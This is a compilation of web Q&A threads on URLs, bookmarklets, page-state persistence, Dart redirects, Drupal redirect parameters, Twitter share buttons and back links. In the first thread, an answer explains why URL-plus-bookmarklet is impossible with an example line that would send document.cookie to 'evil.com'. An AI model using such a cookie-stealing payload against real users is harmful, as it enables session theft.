I need to access some data in someone's site. The way to get to that page is visiting http://www.foosite.com and click a link which has javascript:foo(); to bring out the real data.
foo() is like:
function foo(param){
createXXXCookie('COOKIE_NAME', param, 60);
window.location.href="/current/location";
}
So this is basically setting the cookie and reload the page again. During page load, the document ready reads COOKIE_NAME and display the corresponding data.
I want to use MS Excel to grab some data from this page. So I was looking for a one go way to get the data. Since in browser address bar, I can enter http://www.foosite.com first and then enter javascript:foo(); to invoke foo(). I was wondering if combining the URL and the bookmarklet, like http://www.foosite.com;javascript:foo(); could work? I actually tried this, but it seems IE/FF/GC will skip javascript:... part and just proceed the first part of URL.
This is not possible.
Had it been possible, it would be a deadly security hole.
Email someone a shortlink to http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie)), and move on from there to auto-submitting forms.
Related
My application feature a "main" page where most of the action happens: There are tags for filtering and a list of results in a (paginated) table, plus the possibility to select some or all results in a "shopping cart".
This page has to keep track of a whole lot of things: what tags are selected, what items are selected, and how the result table is sorted and what page it's on. Everything has to persist, so if I select a new tag, the page must partially reload but remember everything (sorting, what's selected).
Right now I'm handling everything with parameters, and for each action taken on the page, all links (select a tag/item, change page, sort table) are updated to include previous parameters + the relevant new addition. This works, obviously, but it feels kind of inefficient, as I have to reload more of the page than I want to. How is this situation normally handled? I can't find that much info on google at all, but it doesn't feel like a particularly uncommon case.
tl;dr: How to best make sure all links (to the same page) always include everything previously selected + the new action. There are a lot of links (one per tag to select/deselect, one per result item to select/deselect, one per sort option, one per page)
There are five ways to do that:
Method 1: By parameters
You mentioned this. I never think of this as it's too troublesome. Anyway it's still a solution for very simple case.
Method 2: By cookie
Save the settings to a cookie and read the cookie in controller to arrange layout settings.
Method 3: By LocalStorage
Similar to cookie but allows more space.
Method 4: By Session
If you are using ActiveRecord to save session, this could be the best solution for pure pages loading. Save the user preferences into session and load it in next layout.
Method 5: Use Ajax
This is the best solution IMO. Instead of whole page loading, use Ajax to refresh/retrieve changes you need. Using together with above method, a user can even continue his last preferences. This is the most powerful and should be applicable to your case which looks like a web app than a website.
Have you tried creating model for all those attributes? and just always load the 'latest' when on the page load, if you dont need them you can always have a flag for that session.
What are the preferred ways to do a redirection and a reload in Dart?
Do we just use: window.location.href = window.location.href?
There are a few different ways to handle URI changes and each have their own purpose.
When you want to send the user to another URI:
window.location.assign('http://google.com')
This one sends the user to Google, keeping the browsing history (the back button history). This is like clicking on a link.
window.location.href = 'http://google.com'
The same as above, just another way to do it. href is a setter, and causes the assignment to happen. I feel the previous version is cleaner.
window.location.replace('http://google.com');
However, the replace() method on LocalLocation object does not only send the user to Google, but also does not put the originating page in the session history, which means the user will not suffer from the never-ending back-button nightmare.
This is essentially the same as an HTTP redirect. The history is skipped.
When you want to do a reload/refresh.
window.location.assign(window.location.href)
Reloads the current page to the exact same URI. This does not contain POST data. Some of the resources (like images, etc.) may me reloaded from the cache, so it might not be a full reload.
This is essentially the same as pressing F5 and skipping the sending of POST data.
window.location.href = window.location.href
Again, the same as previous.
window.location.reload()
This way of reloading the page causes also the POST data to be sent. The "JavaScript version" of window.location.reload() also supports a parameter that specifies whether to skip the cache or not. However, the current Dart implementation does not support that parameter, and defaults to fetch the resources from cache.
This cache parameter may be added to Dart at some point, but it's not there yet. When it arrives, you most likely just pass true as the first parameter and then it would be like Ctrl + Shift + R.
Summary
I want to simulate a click on <a> tag.
Use window.location.assign(url).
I want to redirect to a new website like the HTTP redirection and skip the back-button history.
Use window.location.replace(url).
I want to do an F5 with POST data.
Use window.location.reload().
I want to do an F5 without POST data.
Use window.location.assign(window.location.href).
I want to do an Ctrl + Shift + F5.
Not available, maybe in the future. It would probably be window.location.reload(true).
I've searched a lot to try and solve this problem, but I'm not quite sure what to search for. I didn't really manage to find anything.
Essentially I'm working on a website in which users can register for an event. However, if the user is not logged in, I need to redirect them to the registration screen. This much I've been able to accomplish without much difficulty. However I need to redirect back to the event that they attempted to register for.
My real problem is that the URL of the page I need to return to contains an a parameter, and I'm not sure how to make the registration page take that parameter into account when it redirects back.
Currently when an anonymous user tries to go to
http://[...].com/drupal/?q=civicrm/event/register&id=6
I have it redirect you to
http://[...].com/drupal/?q=user/register&destination=civicrm/event/register&id=6
However, once the form is submitted the "&id=6" is not taken as part of the destination parameter, which means you just go to.
http://[...].com/drupal/?q=civicrm/event/register
Which is not a valid page.
Is there a way for me make the destination parameter include "&id=6"?
On a whim I've also tried.
[...]destination='civicrm/event/register&id=6'
[...]destination="civicrm/event/register&id=6"
[...]destination=civicrm/event/register#id=6
You need to url-encode the value for your destination. Try this:
[..]destination=civicrm/event/register%3Fid%3D6
%3F is hex code for question mark (?), %3D is code for equals (=).
I have a share button on my site.
But I need to share link with parameters, and each time parameters will be different (I need to track user who is sharing, etc.)
For example need to share link like http://mySite.com/page?userId=111&someParam=222
I can share this well, but how can I force count to work correct?
if I set
data-url="http://mySite.com/page?userId=111&someParam=222"
data-counturl="http://mySite.com/page/"
I am getting count 0 always. How to get this work?
From http://dev.twitter.com/pages/tweet_button,
"The count box shows how many times the URL has been Tweeted."
Your problem is you simply have the url and counturl mixed up. Change url to the short one, for display purposes - that's the one people will see. Use the counturl for the one with all the parameters, to ensure they go to the right place with the parameters intact.
I suspect the reason your count kept showing zero tweets is because you have a different (unique) url as your primary url each time it is tweeted, so each tweet is the first time that url (including its parameters) was shared.
Twitter now lets you send the url through data attributes. This works perfectly for me and should work for you out of the box!
The button (check out data-url):
Tweet
The twitter javascript snippet (from https://dev.twitter.com/docs/tweet-button)
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
I have a detail page that gets called from various places and has a nice readable url like
"www.mypage.com/product/best-product-ever".
The calling pages (list of products) have a more complex url like:
"www.mypage.com/offers/category/electronic/page/1/filter/manufacturer/sony/sort/price" and
"www.mypage.com/bestseller/this-week".
How can I make a backlink from the detailpage to the calling product list?
I cannot use javascript
I don't want to have the calling page in the URL, because it gets to long
I really want links between pages, no http-post
I cannot use Sessionstate
EDIT:
Sessionstate is ruled out, because if there are 2 Windows open, then they would share the same "Back" page information.
Like Lee said, use the referrer value:
Back
If you don't want the URL in the link because it's too long, try running some sort of simple compression algorithm over the URL, display the compressed data as unicode text and then append the compressed URL as a parameter to a redirect page, e.g:
Back
What about using the referrer header value?
Here's a crazy idea that will require a fair but of work and may not be healthy for performance (depending on your users).. but here we go:
Create a repository for caching 'ListResults' (and wire it to persist to the DB of you like.. or just leave it in memory on the server).
In short what this Repo can do is store a ListResult which will include everything to persist the state of the current view of the list any given user is looking at. This might include routes and other values.. but essentially everything that is needed to redirect back to that specific page of the filtered and sorted list.
As the ListResult item is added to the repo a small unique hash/key is generated that will be url friendly - something like this "k29shjk4" - it is added to the item along with a datetime stamp.
ListResults are only persisted from the moment a list gets off the default view (ie. no filtering, sorting and Page 1) - this will help in a small way for performance.
A ListResult item may never actually get used but all detail actionlinks on the particular list view have the ListResult.Key hash value added to the route. So yes, it might end up as a querystring but it will be short (url friendly) and if you wanna mess with routes more, you can tidy it up further.
For navigation "back" to the list, you may need a new small controller which accepts simply the ListResult.Key hash value and redirects/re-creates the state of the list view (paging, filtering and sorting included) from the lookup in the repo.
So we have met the requirements so far: no calling page in the url (in the sense that its not the whole page - just a hash lookup of it); no POSTing, no sessions, no js.
To stop the ListResult repo from getting to big (and dangerous: if you persist it to the DB), you can use a ASP.NET background service to periodically prune the 'old' routes by way of the timestamp.. and 'extend' the life of routes that are continuously being used by adding time to the stamp of a ListResult item when it's requested via the new controller. No need to persist a route indefinitely coz if a user wants a permalink to a list view, they can bookmark the long list route itself.
hope this helps somehow
Do you have a cookie?
If so, you can put it in there, or use it to create your own session state.
I think this is more like a "Back to results" then a generic "<< back" link, because you would expect the generic back link to return to the genetic list, not the heavily filtered list you described, right?
I don't know if this falls into your "no post" condition, but the only option I can see is having the Detail action be POST-only ([AcceptVerbs(HttpVerbs.Post)]) and include another parameter like string fullRoute which is converted to the 'link' on the detail page for "Back to results". Overload the Detail action missing the fullRoute param and have the overloaded action be a GET action so that the POST fullRoute value is not required (for when users are ok with the 'generic' "Back" link). This should serve both 'generic' GET requests to the Detail page and the POST request which will include the specific "Back to results" link for the filtered list.